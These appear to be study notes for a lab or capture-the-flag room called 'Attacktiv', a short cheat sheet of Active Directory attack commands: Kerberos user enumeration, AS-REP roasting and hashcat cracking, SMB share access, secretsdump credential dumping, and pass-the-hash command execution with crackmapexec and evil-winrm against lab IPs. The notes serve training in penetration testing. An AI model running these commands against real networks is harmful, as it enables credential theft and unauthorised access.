Attacktiv

* Kerberos user enumeration (the domain name can be enumerated via enum4linux):
  * `kerbrute userenum --dc <IP> -d "<domain>" userlist.txt`
  * `nmap --script krb5-enum-users --script-args='krb5-enum-users.realm="<domain>",userdb=<filepath>' <IP> -p 88`

Kerberos credentials are case sensitive, so "NAME@ibm.com", "name@ibm.com" and "NaMe@ibm.com" are three separate credentials.

* Users with Kerberos pre-authentication not required:
  * `GetNPUsers.py <domain>/ -dc-ip <ip> -usersfile vu2 -no-pass` (vu2 contains bare usernames such as abc, not abc@xyz)
  * It is important to specify `-no-pass`, otherwise a badPwdCount entry will be added to the user.
  * Crack the resulting AS-REP hash: `hashcat.bin -m 18200 --force -a 0 as-rep.hash passwordlist.txt` (`-a 0` = straight/wordlist attack mode, `-m 18200` = Kerberos 5 AS-REP etype 23)

* SMB shares:
  * List shares: `smbclient -U "<uname>%<pwd>" -L <IP>`
  * Connect to a share: `smbclient -U "<uname>%<pwd>" //<IP>/<share>`

* Dumping secrets such as NTLM hashes: `secretsdump.py <domain>/<uname>:<pwd>@<IP>`

* NTLM hash with only an NT component, in secretsdump's `user:RID:LM hash:NT hash` format: `Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc`. The LM part `aad3b435b51404eeaad3b435b51404ee` is the LM hash of an empty password, i.e. no usable LM hash is stored for the account; only the NT hash matters.

* Running commands using the NTLM hash:
  * `docker run docker.io/byt3bl33d3r/crackmapexec:latest smb 10.10.115.121 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc -x whoami`
  * `evil-winrm -i 10.10.252.217 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc`

* Check for open RDP ports and connect with remmina.

Last updated 3 years ago